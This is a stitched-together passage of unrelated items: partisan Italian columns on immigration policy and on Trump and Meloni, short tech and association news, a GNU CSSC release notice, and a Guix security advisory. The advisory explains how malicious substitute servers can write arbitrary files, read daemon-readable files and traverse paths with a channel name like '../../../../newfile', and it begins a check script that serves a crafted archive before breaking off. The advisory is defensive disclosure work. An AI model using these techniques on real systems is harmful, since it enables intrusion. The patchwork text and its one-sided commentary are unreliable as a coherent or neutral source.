Tredici anni dopo anche Leone XIV sceglie Lampedusa. Non è soltanto una visita pastorale. È un messaggio politico, nel senso più alto del termine, è un invito all’Europa a tenere insieme regole e accoglienza. Ed è un messaggio che arriva nel momento in cui il vento soffia nella direzione opposta. Negli Stati Uniti Donald Trump ha trasformato l’immigrazione nel principale terreno di scontro politico, tra deportazioni di massa, muri e retate. In Europa avanzano governi e partiti che considerano ogni barcone una minaccia e ogni politica di integrazione una resa. Ovunque sembra prevalere la tentazione di sostituire il governo dei fenomeni con la loro rappresentazione: meno soluzioni, più slogan; meno regole efficaci, più propaganda. È dentro questo clima che Lampedusa torna a essere una coscienza. Ricorda che controllare i confini è un dovere degli Stati. Ma costruire deliberatamente irregolarità non è una politica. È un fallimento. E proprio qui emerge il paradosso italiano. Esiste una categoria di persone che la destra detesta più di ogni altra: i migranti irregolari. Ne parla ogni giorno. Li indica come il simbolo del degrado, dell’insicurezza, dell’illegalità. Promette di rimpatriarli, di espellerli, di fermarli, di mandarli in Albania.
Sono la materia prima di ogni campagna elettorale. Poi accade una cosa curiosa. La stessa destra difende con i denti la legge che quegli irregolari li produce. La Bossi-Fini è ormai un monumento politico. Dal 2002 non si tocca. È diventata una reliquia identitaria. Guai a dire che forse non funziona. Verresti immediatamente catalogato tra gli amici dell’immigrazione incontrollata. E invece basterebbe leggere i numeri. Meno di un ingresso su dieci previsto dai Decreti Flussi si trasforma davvero in un permesso di soggiorno e in un contratto di lavoro. Gli altri finiscono nel limbo. Invisibili. Ricattabili. Perfetti per il lavoro nero, il caporalato, l’economia sommersa. Una legge nata per combattere la clandestinità produce clandestini in serie. Un piccolo capolavoro. Naturalmente il governo Meloni sa benissimo che l’Italia ha bisogno di lavoratori stranieri. Lo dimostra ogni anno quando approva nuovi Decreti Flussi autorizzando centinaia di migliaia di ingressi. Ed è qui che il racconto diventa irresistibile. Perché oggi i più accesi sostenitori della “remigrazione” sono gli stessi che ieri hanno votato quei decreti. I deputati vannacciani, oggi in Futuro Nazionale, nel 2024 votarono il decreto che autorizzava oltre 450 mila lavoratori stranieri. Forse erano altri? Forse un’improvvisa epidemia di omonimia parlamentare. Oppure, più semplicemente, cambiano le parole d’ordine con la stessa rapidità con cui si cambia gruppo parlamentare. Prima servivano lavoratori. Adesso servono nemici.
La verità è molto meno epica. L’Italia invecchia. Nascono sempre meno bambini. Mancano muratori, infermieri, badanti, camerieri, operai agricoli. Lo ripetono gli imprenditori. Lo sanno i sindaci. Lo sa il governo. Lo sanno tutti. Ma anziché costruire un sistema semplice per fare entrare chi serve, identificarlo, farlo lavorare, pagare le tasse e i contributi, preferiamo costruire un labirinto amministrativo che trasforma persone regolari in persone irregolari. Poi ci indigniamo perché esistono gli irregolari. È un meccanismo quasi perfetto. Prima li fabbrichiamo. Poi li utilizziamo come prova che avevamo ragione. La Bossi-Fini è questo: una gigantesca macchina della clandestinità di Stato. Non perché favorisca l’immigrazione. Perché favorisce l’immigrazione irregolare. Costringe lo Stato a rincorrere permessi, rinnovi, pratiche, timbri e ricorsi, mentre i controlli veri sul lavoro nero restano insufficienti e lo sfruttamento prospera.
Sarebbe curioso chiedere a un elettore di destra se preferisce uno straniero identificato, assunto regolarmente, che versa contributi e paga le tasse, oppure uno sconosciuto senza documenti, senza contratto e nelle mani dei caporali. Probabilmente sceglierebbe il primo. Eppure continua a votare chi difende il secondo modello. Perché la destra ha scoperto una cosa straordinaria: alcuni problemi sono troppo redditizi per essere risolti. L’immigrazione irregolare è uno di questi. Se diminuisse davvero, bisognerebbe trovare un altro argomento con cui spaventare gli italiani. E Lampedusa tornerebbe a essere ciò che dovrebbe essere: un’isola del Mediterraneo. Non il luogo in cui, da tredici anni, due Papi sono costretti a ricordare alla politica una verità elementare: l’immigrazione si governa con regole giuste, canali legali e controlli efficaci, non costruendo clandestini per poi usarli come bersaglio della propria propaganda.
Se fin qui aveva usato la mazza, adesso Donald Trump è passato direttamente alla clava. Il meme, che dovrebbe avere diffusione molto maggiore di un semplice post, messo in rete dal presidente americano nella notte tra domenica e lunedì equivale a una bomba di profondità mediatica. Giusto un’istantanea di Giorgia che guarda adorante l’americano preso di spalle e un laconico commento: “Restraining Order Needed”. Traduzione letterale: “È necessaria un’ordinanza restrittiva”. Traduzione in italiano corrente: “Toglietemela dai piedi”. A confronto la nota intervista telefonica con la quale il presidente aveva aperto le ostilità, quella del ‘ho accettato la foto perché mi faceva pena’ è una carezza.
A palazzo Chigi e nel governo la nuova carica non se l’aspettava nessuno. In vista del vertice di Ankara di domani promette malissimo. Se The Donald picchia così sulla leader che si è scelto come vittima preferita per bastonare l’intera Europa è probabile che arrivi in Turchia deciso a litigare e non è affatto escluso che per aprire le danze se la prenda di nuovo con Giorgia, e stavolta dal vivo. La decisione della premier era prevedibile. Non reagire. Non replicare. Non prestarsi al gioco e tenere le dita ben intrecciate augurandosi che l’americano non vada oltre. In privato i pezzi da novanta della maggioranza bersagliano l’ex idolo Maga. In pubblico restano muti come la stessa premier o commentano flautati. Lo fa Tajani: “Parole che si commentano da sole ma le relazioni transatlantiche vanno al di là delle semplici dichiarazioni”. Lo fa anche Crosetto: “Bisogna mantenere i rapporti con un alleato storico come gli Usa. Le persone passano, i rapporti restano”. Parole molto caute che proprio per questo mettono in risalto il silenzio del vicepremier Salvini che non arriva neppure a tanto e si barrica dietro un imbarazzante ‘No Comment’.
Mantenere la stessa cautela ad Ankara sarà più difficile, dal momento che per quanto si sforzi di star lontana dal nemico americano Meloni non potrà evitarlo soprattutto se a scegliere lo scontro fosse lui, come è in realtà improbabile ma non impossibile. Ma il punto critico non sono le eventuali villanie di Trump: è la concretissima materia del contendere, cioè le spese militari. Perché proprio su quel fronte l’Italia arriva ad Ankara ancora più esposta del resto d’Europa che già non scherza. Un anno fa, a L’Aja, tutti, con l’esplicito intento di ingraziarsi il rissoso Donald, avevano accettato l’impegno di portare le spese per la difesa sino al 3,5% e quelle per la sicurezza all’1,5% entro il 2035. Detto e non fatto, soprattutto dall’Italia.
La premier arriverà vantando un salto dall’ 1,6% al 2,8% nell’ultimo anno e promettendo di “proseguire in questa traiettoria”, cioè confermando quanto meno esplicitamente possibile il proibitivo impegno. Quelle percentuali però sono in buona parte taroccate. La spesa italiana va divisa in un 2,09% per la difesa propriamente detta e in uno 0,71% per la sicurezza intesa in senso molto lato. La prima percentuale supera di poco quella del 2025, 2% e anche allora il salto di quattro decimali era dovuto non a veri nuovi investimenti ma a un riconteggio di spese precedenti che, tirando un po’ le cose per i capelli, possono rientrare comunque negli standard Nato. La percentuale investita in sicurezza, poi, stata raggiunta considerando “sicurezza” davvero di tutto e di più. Lo sanno tutti in Italia. Difficile credere che non lo sappia Trump.
Bisogna aggiungere due particolari decisivi. L’Italia ha scelto di non aderire al Purl, il piano di acquisti di armi americane da inviare all’Ucraina. Soprattutto, dopo aver prenotato in autunno 14,9 mld per le armi con il SAFE, il prestito molto agevolato europeo, tutto è stato congelato e, nonostante le recenti e volutamente ambigue dichiarazioni, non è affatto detto che il governo scelga di accedere a quel prestito. Conclusione: anche al di là del personale malanimo di Trump nei confronti della ex pupilla che considera oggi una traditrice, l’Italia è davvero l’anello più debole della catena europea e si presterebbe pertanto comunque a fare da primo bersaglio se il presidente americano decidesse, come è probabile che faccia, di attaccare a testa bassa. La premier mira a parare il colpo con la promessa di investire lo 0,55% in più entro il 2028. Sono 17 mld e trovarli in piena campagna elettorale non sarà né facile né indolore.
In casa l’opposizione tutta offre solidarietà alla premier. Schlein e Conte adoperano quasi le stessa formula: le parole di Trump sono inaccettabili ma a prestare il fianco facendosi incantare dalla propaganda Maga invece di scegliere risolutamente l’Europa è stata proprio la maltrattata. Piena solidarietà ma è ora che si svegli. Non che Giorgia possa battere altre strade. A questo punto fidarsi ancora della Casa Bianca indicherebbe solo tendenze suicide e cercare riparo dietro l’Europa è l’unica possibilità per Giorgia. È una devastante sconfitta di tutta la sua strategia in politica estera ma è anche una strada a modo suo comunque impervia. Perché sia per quanto riguarda l’Ucraina che il riarmo anche i partner europei pretendono a questo punto molto più che belle e molto economiche parole.

clamav-unofficial-sigs fornisce un modo semplice di scaricare, testare e aggiornare database verificati di terze parti forniti da Sanesecurity, FOXHOLE, OITC, Scamnailer, BOFHLAND, CRDF, Porcupine, Securiteinfo, MalwarePatrol, Yara-Rules Project, urlhaus, etc. Lo script genera e installa anche cron, logrotate, e i file man.
L'aggiornamento alla versione major 8.0.0 a partire dalla versione 7.x semplice:
clamav-unofficial-sigs.sh --upgrade clamav-unofficial-sigs.sh --force
Controllare il file log /var/log/clamav-unofficial-sigs/clamav-unofficial-sigs.log alla fine.





L’intelligenza artificiale sta entrando nelle aziende con una velocità che non ha precedenti, ma la sua diffusione sta facendo emergere una realtà che molti responsabili della sicurezza stanno iniziando a sperimentare direttamente: i tradizionali strumenti di difesa non sono stati progettati per proteggere sistemi che ragionano attraverso il linguaggio naturale. Firewall, Web Application Firewall e […]
L'articolo AI, il nuovo fronte della sicurezza: il red teaming diventa indispensabile proviene da Securityinfo.it.
Using the cloc utility, Michael Larabel of Phoronix discovered that Linux kernel 7.2 has over 43 million lines of code.


Il doppio centenario della JARL
Il 12 giugno 2026, la Japan Amateur Radio League (JARL) ha celebrato il centesimo anniversario della sua fondazione. Successivamente, la nostra consorella IARU festeggerà il centenario dell’emissione della prima licenza ufficiale per una “stazione sperimentale privata di radiotelegrafia e radiotelefonia a onde corte”, rilasciata il 10 settembre 1927 a Kankichi Kusama con nominativo JXAX. La sperimentazione era limitata a una sola banda (38 metri) e con una potenza massima di 10 watt, ma ciò che conta è il riconoscimento a livello governativo dell’attività radioamatoriale, fino a quel momento condotta in modo “abusivo”.
Il prossimo 19 luglio, Anniversario della Liberazione di Livorno, a partire dalle 18.30, sarà l’occasione per presentare alla cittadinanza la nuova sede dell’ISTORECO.
Grazie alla disponibilità del Comune, del Sindaco e alla riconosciuta rilevanza della nostra attività in città sul fronte della conservazione della memoria, della divulgazione di una conoscenza critica del nostro passato, della promozione costante di ricerche di qualità che hanno attirato l’attenzione di studiosi, siamo stati individuati come il soggetto adatto a entrare in questa sede prestigiosa contrassegnata dagli avvenimenti più importanti degli ultimi due secoli passati.
La nuova sede è l’Edificio dell’Orologio, ex ingresso del Cantiere Navale di Livorno, un pezzo della storia del Novecento livornese.
Il presidente nazionale dell’Istituto Nazionale “Ferruccio Parri”, Senatore Paolo Corsini, terrà la commemorazione ufficiale, accompagnato dagli interventi della direttrice Catia Sonetti e di due nostri giovani collaboratori. Il tutto sarà allietato dalla banda cittadina.
Come Istoreco abbiamo deciso di presentarla alla cittadinanza in un momento di festa importante, con ospiti illustri. Naturalmente la piena operatività della sede sarà rinviata di qualche mese per le necessità legate al trasloco e per alcuni accorgimenti per poter accogliere cittadini e studenti. Motivo per cui gli uffici fino all’autunno saranno in Via Marradi.
Vi aspettiamo numerosi!

This is to announce CSSC-1.5.0, a beta release.
There have been 424 commits by 2 people since 1.4.1. Thanks to Greg A. Woods for helping to improve CSSC.
See the NEWS below for a brief summary.
===============================================================
Here is the GNU CSSC home page:
https://gn ... rg/s/CSSC/
Here are the compressed sources and a GPG detached signature:
https://alpha.gnu ... CSSC-1.5.0.tar.gz
https://alpha.gnu ... -1.5.0.tar.gz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.o ... rg/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
File: CSSC-1.5.0.tar.gz
SHA256 sum: 8483a31aac756955843ef574bed6fa9e052ea492217f3882033487d2704c6cf4
SHA3-256 sum: c138c32cab373a51c32d2049064532ac24a6fa777b7edecabe4d605460018845
Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.
Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify CSSC-1.5.0.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096 2015-12-24 [SC]
0CF4 E8D8 7159 3224 8428 32B8 88DD 9E08 C5DD ACB9
uid James Youngman <james@youngman.org>
uid James Youngman <jay@gnu.org>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key james@youngman.org
gpg --recv-keys 88DD9E08C5DDACB9
wget -q -O- 'https://savannah. ... SC&download=1'
| gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify CSSC-1.5.0.tar.gz.sig
This release is based on the CSSC git repository, available as
git clone https://https.git ... .org/git/CSSC.git
with commit 77bdce39a09b9ff37831c4dd1cb0d4dd5967cb39 tagged as v1.5.0.
For a summary of changes and contributors, see:
https://gitweb.gi ... shortlog;h=v1.5.0
or run this command from a git-cloned CSSC directory:
git shortlog CSSC-1.4.1..v1.5.0
This release was bootstrapped with the following tools:
Autoconf 2.72
Automake 1.17
Gnulib 2026-06-08 88592a2880cf39a2f597cd0294a90d8dd7faa2df
NEWS
* The test suite no longer depends on Python, so it should
work on older systems that have no Python 3 interpreter. While you can
build and test CSSC without Python, you do need a Python interpreter
to do some maintenance tasks (such as importing the "gnulib" code into
a git checkout).
* Tolerate SCCS files in which file flags lack the space
separator which would normally come between the flag letter and the
associated value.
* Some typos in error message have been fixed.
* admin now supports combination of -r with -n as well as the
portable combination of -r with -i.
* Support "sccs sact"; the sact program already existed but
could not previously be invoked via the sccs wrapper. Thanks to Greg
A. Woods for this improvement.
* In some places we now prefer "grep -E" to "egrep" in order
to avoid a warning message from GNU grep. Some very old versions of
Unix may not support this option.
* Various C++ portability improvements.
* Updated version of gnulib.
* Updated version of googletest; this is now at the last
version at which it still supported building with Automake.
* This release is more careful to detect I/O failures when
writing to stdout in prs and prt.
* This release should build on more modern platforms.
* The --with-googletest configure option is removed (now we
always use it).
* Updated versions of gnulib and googletest.


Die USKA wehrt sich gegen die pauschale Beschlagnahmung von Amateurfunkanlagen in Krisenzeiten, wie sie die geplante Requisitionsverordnung des Bundes vorsieht.
Das Eidgenössische Departement für Verteidigung, Bevölkerungsschutz und Sport (VBS) plant eine neue Requisitionsverordnung. Die Vorlage greift extrem weit und erlaubt es der Armee, im Ernstfall technische Anlagen und Dienstleistungen ohne klare Einschränkungen zu beschlagnahmen. Für Funkamateure und Funkamateurinnen bedeutet das im schlimmsten Fall: Das VBS holt die Ausrüstung ab.
Vernehmlassung
Aus diesem Grund hat die USKA im Rahmen der Vernehmlassung am 30. Juni 2026 eine Stellungnahme eingereicht. Die USKA fordert, dass Anlagen und Betriebsmittel des Amateurfunkdienstes inklusive der lizenzierten Betreiber/-innen explizit von der Requisition ausgenommen werden, sofern sie für die Not- und Krisenkommunikation vorgesehen sind.
Der Wert einer Funkstation entsteht nicht durch das Blechgehäuse. Erst das Zusammenspiel von Gerät, Antenne, Stromversorgung und der jahrelangen Erfahrung der Funkamateurinnen und Funkamateure bringt im Krisenfall den Nutzen. Ein requiriertes Gerät in den Händen eines ungeschulten Soldaten ist völlig nutzlos.
Eingespielte Infrastruktur
Demgegenüber garantieren wir eine dezentrale, eingespielte Infrastruktur. Wir betreiben in der Schweiz mehr als 250 Relais-Standorte auf Höhen wie dem Säntis, Pilatus oder Chasseral. Diese Netze funktionieren dank Notstromversorgung für mindestens drei Tage autark.
Die Behörden in den Kantonen und Gemeinden haben das verstanden. Es existieren bereits mehr als ein Dutzend Zusammenarbeitsvereinbarungen mit dem Zivilschutz oder den Feuerwehren.
Bund gefährdet Kommunikationssicherheit
Wenn der Bund diese Strukturen durch eine Requisition zerschlägt, gefährdet er die Kommunikationssicherheit der Schweiz. Unsere Funkgeräte laufen mit einfachen Batterien oder kleinen Solarpanels. Wir sind in der Lage, innert kürzester Zeit nach einem Totalausfall der kommerziellen Netze erste Kontakte aus einem Krisengebiet zu aktivieren.
USKA bietet Hand für Kooperation
Die USKA vertritt über 3000 der rund 5000 Funkamateure im Land. Wir bieten dem Bund Hand für eine Kooperation, fordern aber im Gegenzug den Schutz unserer technischen Ressourcen. Fakt ist: Der Amateurfunk hilft dem Land am meisten, wenn man ihn arbeiten lässt.
USKA Eingabe Vernehmlassung Requisition
Published: HB9HGH 2026-07-05 09:26:40

L'articolo Smartphone e produttività: come gestire le app che consumano batteria proviene da FullPress.


Il centro di ricerca ARCO di Fondazione PIN (Polo di Prato dell’Università degli Studi di Firenze), in stretta collaborazione con il Comune di Vernio e la Società della Salute Area Pratese, ha lanciato un'importante iniziativa dedicata al benessere della popolazione anziana del territorio. Si tratta di un questionario mirato a raccogliere le opinioni e le esperienze dirette dei cittadini con più di 65 anni residenti nel Comune di Vernio e nelle zone vicine.
Il centro di ricerca ARCO di Fondazione PIN (Polo di Prato dell’Università degli Studi di Firenze), in stretta collaborazione con il Comune di Vernio e la Società della Salute Area Pratese, ha lanciato un'importante iniziativa dedicata al benessere della popolazione anziana del territorio. Si tratta di un questionario mirato a raccogliere le opinioni e le esperienze dirette dei cittadini con più di 65 anni residenti nel Comune di Vernio e nelle zone vicine.
Da ieri il Large Hadron Collider (LHC) del CERN è stato spento per lasciare spazio ai lavori di trasformazione che porteranno a High Luminosity LHC (HiLumi LHC), un upgrade dell'acceleratore LHC che entrerà in funzione intorno al 2030.
Sono aperte le iscrizioni all’AA 2026-2027! - Con una proposta solida di ben 152 corsi di laurea e un tasso di occupazione dei laureati magistrali che supera l’82% a un anno dal titolo, UniFi si conferma una scelta vincente per costruire il proprio futuro professionale. Scopri il manifesto a questo link!
Sono aperte le iscrizioni all’AA 2026-2027! - Con una proposta solida di ben 152 corsi di laurea e un tasso di occupazione dei laureati magistrali che supera l’82% a un anno dal titolo, UniFi si conferma una scelta vincente per costruire il proprio futuro professionale. Scopri il manifesto a questo link!

Several security issues (CVE IDs pending) have been identified in guix substitute, a helper utility invoked by
guix-daemon,
which enable a variety of harmful activities including remote privilege
escalation to the build daemon user, remote store corruption, and
potentially local disclosure of sensitive files accessible to the build
daemon user. All systems are affected, whether or not guix-daemon is running
with root privileges; the harm that can be done when guix-daemon runs without
root privileges is more limited. You are strongly advised to upgrade your
daemon now (see instructions below), carefully considering whether to pass
--no-substitutes to all guix commands when you do so (see note in Upgrading
section).
The remote exploitation of guix substitute only requires that the vulnerable
system attempt to download a binary substitute. Any configured substitute
server, including ones discovered using guix-daemon's --discover option, can
exploit this, and so can a man-in-the-middle (MITM), regardless of whether
https is used in the substitute server urls.
The local exploitation of guix substitute only requires the ability to connect
to guix-daemon's socket, which by default any user can do.
Separately, another security issue (CVE ID pending) was identified in guix pull and guix time-machine, which enables anyone who can control the channels
file used by these commands to cause a file to be created or overwritten
wherever the user running the command in question has permission to create
them. This is possible regardless of whether the channels file is evaluated in a
sandbox and whether the channels used are limited to those sharing an
introduction with a trusted channel. Due to limitations on the content of the
created or overwritten file, this primarily represents a denial-of-service
risk, though in theory it could do more.
Update 2026-07-06: if you are using the unprivileged
guix-daemon, as is the default on distros other than Guix System since version 1.5.0, and if you updated it between July 2nd and July 5th, you've probably been affected by this regression preventing substitutes from working. It is now fixed, but if you are stuck trying to upgrade, try passing--no-substitutes. If you can't reasonably upgrade without substitutes, you can either take your chances downgrading to the vulnerableguix-daemonand using it or try tinystar's workaround (doesn't apply to Guix on distributions other than Guix System).
Three distinct vulnerabilities have been identified affecting guix substitute,
with a fourth affecting guix pull and guix time-machine:
(CVE assignment pending) The procedure that Guile code uses to unpack
substitutes, restore-file in (guix serialization), was not hardened
against malicious input, but it was called to extract the substitute being
downloaded as it was being downloaded, rather than waiting until after the
entire archive had been obtained and its hash had been verified. These
facts together make it possible for any substitute server (or any entity that
can impersonate one) to write arbitrary files to any place on an affected
system that the daemon user has permission to write to. In the case of the
daemon running as root, that includes /etc/passwd.
To avoid depending on the X.509 Public Key Infrastructure, the procedure that
fetches metadata about available substitutes (called narinfos),
fetch-narinfos, does not verify server certificates, since the canonical
parts of narinfos need to be signed anyway to be considered valid.
Unfortunately the substitute URL is not one such canonical part, and so it
can be replaced with an attacker-controlled URL. If the substitute
downloaded doesn't match the signed hash in the narinfo, it will be rejected,
but by then it is too late: the substitute was extracted as it was being
downloaded, so the damage is already done.
This means that even though download-nar, the procedure responsible for
actually downloading the substitute, does itself verify server certificates,
using https in substitute server urls cannot limit who can exploit this, as
the certificate only needs to be appropriate for the attacker-controlled URL.
restore-file is also used by other utilities, including guix offload,
guix archive --extract, and guix challenge. These can all be exploited
in the same way if untrusted input is given to them.
(CVE assignment pending) The procedure that fetches metadata about available
substitutes (called narinfos), fetch-narinfos in (guix substitutes),
does not verify that the narinfo it got is the one it asked for, nor do any
of its callers in (guix scripts substitute). Consequently, it is possible
for a substitute server (or anyone who can impersonate one) to trick guix substitute into using any store item for which there is an authorized
substitute as a substitute for any other store item for which there is an
authorized substitute. The complete extent of harm that can be caused by this
depends in part on what store items an authorized substitute server has
signed or can be convinced to sign, but at minimum this can be used to cause
outdated and insecure versions of software to be used.
(CVE assignment pending) The implementation of guix substitute in (guix scripts substitute) permits file:// URIs to be used both for specifying
substitute server URIs (where to look for narinfos) and for specifying within
narinfos where to download the corresponding archive from. It does not
distinguish between --substitute-urls passed on the guix-daemon command
line and --substitute-urls passed on the guix command line (client-side),
with the latter taking precedence over the former. Opening of these file://
URIs follows symbolic links. Consequently, an untrusted client may cause any
file that the daemon can read to be read. If a given line of it doesn't look
like a valid narinfo line (it uses recutils format), guix substitute may
throw an exception, causing a backtrace containing that line to be passed
through to the client. So, for example, a file containing a single line
containing only a secret passphrase may have its contents revealed to any
local user if the daemon user can read it.
Additionally, when a file:// URI is used as the URI of a nar to download,
it may be written to the store if it happens to be a valid nar ("normalized
archive") as used by Guix and Nix. This is unlikely, though.
In addition to possibly causing secrets to be disclosed, this can also be
used to interfere with the reading of any file being read by any process that
the daemon user could trace, through the use of files in /proc/PID/fd.
(CVE assignment pending) The procedure which guix pull and guix time-machine use to authenticate channels, authenticate-channel in (guix channels), passed a cache key derived from the channel name to
authenticate-repository in (guix git-authenticate). This cache key was
used to determine a filename for storing previously-authenticated commit IDs
in. If the channel name was of the form "../../../../newfile", it could have
caused "newfile" to be created in the user's home directory. It may also have
overwritten "newfile" if it already existed, but only if it already looked
like a Scheme-syntax list of strings, since the contents would have to have
first been read and processed before new contents would have been written.
In the event that a write is performed, the output will only include a
Scheme-syntax comment, newline, and list of hexadecimal strings corresponding
to git commit identifiers. This makes it difficult to use for a practical
attack other than a denial-of-service, but note that since it can target
files in /proc, a sufficiently creative and informed attacker may be able
to exploit this further.
Realistically, this vulnerability can only be exploited when fetching remote channel files with the newly-added mechanism for doing so.
Vulnerabilities (1) and (2) can be mitigated against remote attackers by not
using substitutes, either by passing --no-substitutes to guix-daemon or
passing --no-substitutes to all guix commands. It's always possible to turn
substitutes back on for an individual client, though, so this doesn't work to
defend against a local attacker exploiting (1), (2), or (3), which cannot be
mitigated and must be fixed by updating. Vulnerability (4) can be mitigated by
not running guix pull or guix time-machine with an untrusted channels file.
A test for the presence of these vulnerabilities is available at the end of this post. One can run this code with:
guix repl -- guix-substitute-and-pull-vuln-check.scmThis will finish with a sequence of 4 lines, beginning with restore-file,
fetch-narinfos, file-uris, and cache-key respectively, each followed by a
colon, a space, and either vulnerable or not vulnerable depending on whether
the running guix-daemon has the indicated vulnerability or not. If all 4 lines
contain not vulnerable, then guix repl will exit with status code 0,
otherwise it will exit with status code 1.
Some of the tests can fail to produce a result in some cases. In this case the
output following the test name will start with error:. A test that fails to
produce a result should be regarded as inconclusive.
The restore-file and fetch-narinfos tests may fail to produce a result if no
substitutes are authorized, or if no authorized substitutes for the current
guix's cfunge, hello, or sed packages can be accessed through any of the
configured substitute urls. The restore-file test may fail to produce a result
if cfunge is reachable from some garbage collection root, such as a
profile. The cache-key test may fail to produce a result if network access to
codeberg to fetch a small portion of the history of the guix-science channel
is not available, which can be worked around by editing the script's definition
of guix-science-url to be any URL (or a filename) at which a copy of the
guix-science repository can be found.
These security issues have been fixed by a series of 11 commits, starting with ed0a9721f8a20d6ddcf6a0495302f502b3f7bb17 and ending with 2ef8ed9f0df53bddf14bdecc2ea48c2d233213cc as part of pull request #9665. Users should make sure they have upgraded to commit 897832f374dcdc9eeaf19d01e70b9a92fccfc68c or any later commit to be protected from these vulnerabilities. Upgrade instructions are in the following section.
Fixing vulnerability (1) involved hardening restore-file so that it detects
and rejects invalid directory entry names. Specifically, entry names must be
unique, in strictly ascending order, not empty, not equal to "." or "..", and
not containing "/" or null bytes. Additionally, procedures currently used as the
#:dump-file argument to restore-file were modified to insist on creating the
target file afresh and never follow symbolic links.
The inspiration for that last change came from looking at the implementation of
nar-parsing in parse in nix/libutil/archive.cc, where it was determined that
that implementation was not vulnerable, but was about as close to vulnerable as
it could get without actually being vulnerable, only barely being saved by the
fact that the filesystem primitives used all refused to follow symbolic links or
accept an existing target (see this commit
message for
details). To avoid wasting another 3 hours trying to determine this the next
time anyone tries looking at it with a critical eye, that implementation was
also rewritten to be stricter and more obviously secure. It is perhaps not
surprising that the same code led to CVE-2024-45593 in Nix when it was modified
to use more lax filesystem primitives from std::filesystem.
Fixing vulnerability (2) involved modifying fetch-narinfos to not include a
result if it didn't match what was asked for.
Fixing vulnerability (3) involved modifying (guix scripts substitute) to
verify that all substitute urls from untrusted sources are not file:// urls,
and that all nar urls in narinfos are not file:// urls (except when a special
flag is set, which is only done in the test suite).
Some additional hardening was also done, so that substitutes are restored inside a temporary directory and only moved to their final store item path once the hash is verified. This still restores them before verifying the hash, so it wouldn't have prevented (1), but it does ensure that attacker-controlled contents are not present at the path of what may have once been a valid store item (and may still be considered by some users or programs to be valid if they haven't taken note of a recent garbage collection). The narinfo-reading code was also modified to reject as invalid any narinfo file whose StorePath, References, or Deriver field contained a path that did not obey the store item path syntax requirements. A nice side-effect of this is that we now have procedures for verifying the syntax of store item paths.
Fixing vulnerability (4) involved changing how cache-key was computed by
default for users of authenticate-repository. Rather than being derived from
the name of the channel or (for guix git authenticate) the url of the
repository, cache-key is now derived from the ID of the introductory commit,
which is a very safe hexadecimal string. This also avoids some strange and
potentially-dangerous behavior in which cached authenticated commit IDs could be
shared between two channels that happen to share a name but are otherwise
completely different. Additional hardening of authenticate-repository was
added to turn all occurrences of . in cache-key into - so that even if
non-default cache keys were provided, it would not be possible to escape the
cache directory.
Due to the severity of this security advisory, we strongly recommend all users
to upgrade guix and guix-daemon immediately.
Note: The astute reader may have noticed a dilemma: the fastest way to get updates is through substitutes, and the way to mitigate the most severe of the remotely-exploitable vulnerabilities is to disable substitutes. Whether to pass
--no-substitutesis therefore a judgment call that must take into consideration how long it has been since these vulnerabilities were made public, how exposed the network paths between your system and your substitute servers are, how feasible it is for the system in question to build guix by itself (which will depend in part on how long it has been since you last upgraded), whether the system in question has multiple users, and of course, your threat model.
For Guix System, the
procedure
is to reconfigure the system after a guix pull, either restarting
guix-daemon or rebooting. For example:
guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemonwhere /run/current-system/configuration.scm is the current system
configuration but could, of course, be replaced by a system configuration file
of a user's choice.
For Guix on another distribution, one needs to guix pull with sudo, as
the guix-daemon runs as root, and restart the guix-daemon service, as
documented.
For example, on a system using systemd to manage services, run:
sudo --login guix pull
sudo systemctl restart guix-daemon.serviceNote that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.
restore-file vulnerability
with Christopher Baines and Andreas Enge; Christopher sends details to the
Security Response Team.file:// vulnerability
of guix substitute.guix substitute did not verify whether the narinfo it is getting is the one it
asked for.pull and time-machine vulnerability and
works on a fix. For the sake of convenience and because hints were available
publicly, it was decided that it should be promptly fixed and disclosed at the
same time as the other vulnerabilities.We would like to thank Jörg Thalheim for sharing the restore-file
vulnerability, Christopher Baines for verifying it and informing the Security
Response Team, and Andreas Enge for ensuring
that it reached Ludovic and Caleb and facilitating ongoing communication with
Jörg.
We would also like to thank John Kehayias of the Security Response Team for coordination and for requesting CVE IDs.
Below is code to check if your guix-daemon is vulnerable to the first three
vulnerabilities and your guix is vulnerable to the fourth. Save this file as
guix-substitute-and-pull-vuln-check.scm and run following the instructions
above, in "Mitigation."
(use-modules (git)
(guix build utils)
(guix derivations)
(guix channels)
(guix config)
(guix gexp)
(guix git)
(guix narinfo)
(guix packages)
(guix pki)
(guix utils)
(guix serialization)
(guix store)
(guix substitutes)
((gnu packages base) #:hide (which))
(gnu packages esolangs)
(srfi srfi-1)
(srfi srfi-26)
(srfi srfi-31)
(srfi srfi-34)
(rnrs bytevectors)
(ice-9 atomic)
(ice-9 binary-ports)
(ice-9 control)
(ice-9 match)
(ice-9 popen)
(ice-9 rdelim)
(ice-9 textual-ports)
(ice-9 threads)
(web response)
(web request)
(web uri)
(web server)
(web server http))
;; 1. restore-file
;; Craft an invalid nar, identify a substitutable path that doesn't exist (gc
;; if necessary), get its signed narinfo, start an http server, connect to
;; store, set substitute urls, ask to substitute the chosen path. Have http
;; server serve the signed narinfo with the URLs replaced with its own. When
;; the nar is requested, serve the invalid nar. Once the substitution errors
;; out (hash doesn't match), check whether the chosen file now exists with the
;; specified contents. We're vulnerable if and only if it does.
(define target-file
"/tmp/guix-restore-file-vulnerable")
(define target-substitutable-package
;; pick something obscure but in the main guix channel, so it is either not
;; currently valid or can probably be gc'ed. This is just to make the test
;; more reliable - in real exploitation, an attacker can sit around and wait
;; for any substitute request to be made, but here we need to provoke one in
;; a timely manner.
cfunge)
(define substitute-servers
(with-store store
(substitute-urls store)))
;; Grafts can cause package->derivation to actually start substituting outputs
